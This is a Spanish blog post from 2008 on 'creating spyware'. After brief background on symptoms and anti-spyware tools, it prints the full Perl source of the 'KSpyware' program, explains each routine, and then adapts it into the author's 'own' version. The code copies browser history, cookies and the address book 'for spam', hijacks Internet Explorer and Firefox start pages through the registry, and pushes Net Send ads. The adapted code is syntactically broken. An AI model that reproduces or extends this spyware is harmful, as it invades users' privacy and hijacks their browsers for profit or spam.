Sign by Dealighted - Black Friday Coupons

viernes, 26 de diciembre de 2008

Crear spyware

Lo interesante de este texto que está por Internet es el código fuente.
Respecto a protegerte del spyware, puede leerse este artículo:
http://www.microsoft.com/latam/technet/seguridad/articulos/adware.asp


Los spyware en si tienen una similitud con los virus, pero a diferencia del virus el spyware no tienen codigo dañino para nuestros ordenadores, por esta razon nuestros antivirus no se pueden encargar de reconocerlos y eliminarlos.

Entonces podemos decir que los spyware son como pequeños programas que se instalan en nuestro ordenador y espian nuestros datos y lo que hacemos en la red con el unico fin de enviar esa informacion espiada a empresas de publicidad en la internet, con esos datos esas empresas puede comerzialisar y incluso regresar spam por correo electronico. El spyware trabajaa en background es decir en modo de [segundo plano] esto lo hacen con el proposito de no nos demos cuenta de que el esta ahi hasta que aparezca el primer sintoma.

Si tenemos spywares en nuestro ordenador es peligroso, porque al espiar pueden encontrar, tu direccion de correo electronico e incluso su password. Al tenerlo los espias podrian floodeart de spam. Direcciones de ip y DNS, telefono, pais, paginas que visitas y algunos websites que te interesen, es decir todo lo que hagas en la red podria ser espiado por ellos. Para mi lo mas peligroso es que ellos pueden saber lo que tu compras en la red, y al comprar necesitas o una CC [Tarjeta de Credito] o una CB [Cuenta Bancaria], al ingresar estos datos podrian ser capturados por los spywares.

Los spywares mas comunes que puedan ingresar en tu ordenador son los siguientes: AdSofware, Alexa, Cydoors, Gator, Web3000, Webhancer, CoolWebSearch, BlazeFind.Bridge, Xupiter, Hotbar, Kazaa etc....

Alguno de los sintomas mas comunes que siente nuestro ordenador cuando obtiene spyware pueden ser los siguentes:
[] Nuevas paginas favoritas agregadas a la lista de tu explorador.
[] Errores de navegacion en tu explorador.
[] Paginas de inicio modificadas, y/o cambiadas a otras.
[] Comienzan a aparecernos pop ups a lo loco. Aun sin estar conectado, y sin tener el explorer abierto.
[] Las famosas tool bars o search bars comienzan a aparecer.
[] Nuevos botones, y utilidades se bajan, como junk soft o programas basura.
[] Notas el incremente de porn websites ves porno a menudo, y incluso en tu ordenador aparecen, el mas comun es el HotTartz.
[] La velocidad de tu tu navegador varia.

Para protegernos antes estos espias necesitamos armarnos de software que los repela y los elimine. Estos software son muy facil de encontrar, ademas son freeware. Ahora les dejare una lista de donde descargarnos los mas comunes y mas utiles.

SpyBlaster 3.3 [2.5MB]
http://securityhelpers.net/downloads/spywareblastersetup33.exe

SpyBot Search & Destroy 1.3 [4.6MB]
http://tucows.wau.nl/files/spybotsd13.exe

Adware SE Tweak SE [0.5MB]
http://download.lavasoft.de.edgesuite.net/public/pltweakse.exe

HijackThis 1.9.91 [0.1MB]
http://merijn.arwinianos.net/HijackThis.exe


Si necesitas una lista mucho mas amplia porfavor ve a la siguiente direccion: http://www.elhacker.net/seguridad.htm#A%20n%20t%20i%20%20-%20%20W%20o%20r%20m%20s

Ahora lo mas impresionante en este pequeño articulo, es que posee el primer codigo abierto de un spyware, los codigos de los spywares casi nunca son vistos.
Este me lo encontre en Kspyware una nueva web la cual fue echa con el unico proposito de sacar a luz un spyware echo en perl http://nzeka-labs.com/hacking/KSpyware.htm
KSpyware es el primer open source spyware accesible en la net.

Aqui les dejo el codigo fuente de KSpyware el cual esta hecho en Perl:


Código:
############################################
### KSpyware v0.1 for educational purpose ###############
############################################

use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;

############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################

sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";

opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";

print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}


#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################

sub indexsites {
my $name;
$name=Win32::LoginName();

$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

}

########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################

sub mails {
my $name;
$name=Win32::LoginName();

$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);

}

#####################################
### Hijack IE by modifying the main page ##########
#####################################

sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};

$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}

#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################

sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}

###################
### Entry point !!! #######
###################

$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";

programfiles();
indexsites();
mails();
mainpage();
pub();

exit 0;



Ahora les explicare para que sirve cada modulo de este codigo en perl.

Con este codigo obtendremos una lista de programas instalados en el sistema.

Código:
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################

sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";

opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";

print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}


Con este codigo obtendremos las direcciones URL que la victima a visitado, tambien tendremos las cookies.

Código:
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################

sub indexsites {
my $name;
$name=Win32::LoginName();

$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);

$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);

}


Con este codigo obtendremos direcciones de correo electronico para poder hacer spam...

Código:
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################

sub mails {
my $name;
$name=Win32::LoginName();

$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);

}


Con este codigo sabotearemos el IE explorer para cambiar la pagina de inicio.

Código:
#####################################
### Hijack IE by modifying the main page ##########
#####################################

sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};

$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}


Para utilizar este codigo necesitamos que el Net Send este activado, asi podemos enviar anuncioes etx es como spam.

Código:
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################

sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}



Y con este el entry point...

Código:
###################
### Entry point !!! #######
###################

$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";

programfiles();
indexsites();
mails();
mainpage();
pub();

exit 0;

-----------------------------------------------------------------------------

Basandonos en el codigo podemos crear nuestro propio spyware, aqui la prueba

Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;



En Perl seria asi para sabotear el IE

Con esto sabotearemos el IE y hacerlo que nos redireccione la pagina principal a www.elhacker.net

Código:
***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};

$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];


Con esto sabotearemos el mozilla y hacerlo que nos redireccione la pagina principal a www.elhacker.net

Código:
***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};

$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];



Entonces claro como no se muxo Perl me estoy basando en el codigo anterior. Entonces mas o menos esto llevariamos, el spyware nos cambiaria la pagina principal de el IE y del Mozilla.

Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;

***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};

$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/t", "REG_SZ" ];

***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};

$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= ["http://nobanet.xternal-host.com/", "REG_SZ" ];


No quiero entrar en tantos datos porque el perl no es mi lenguaje jeje y la verdad no soy programador, se ahi un poco de FORTRAN, COBOL, C pero pues el resto de lenguajes lo que se es lo basico, pero claro con este codigo y un poco de imaginacion podemos hacer mucho.

Cedido por P3t3rp4n

Comentarios, d su blog:

Para hacerlo funcionar:
Pues el código perl, tendrías que descargarte el intérprete (Active Perl) e instalarlo. Después te metes en el directorio en el que lo has instalado y pones perl [nombre del archivo] para ejecutarlo. De todos modos, el código es tan solo una prueba de concepto; actúa sobre tu propio ordenador, no en remoto, y además es código fragmentario de como acceder a los datos, no lo manda ni lo utiliza...

Aquí tienes un manual de pearl, pero sin unas bases sólidas de informática, esto requiere demasiado tiempo y normalmente pocos resultados:

http://www.manualesutiles.com/manuales/Manual%20de%20pearl.zip
Publicado por en
Etiquetas: ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)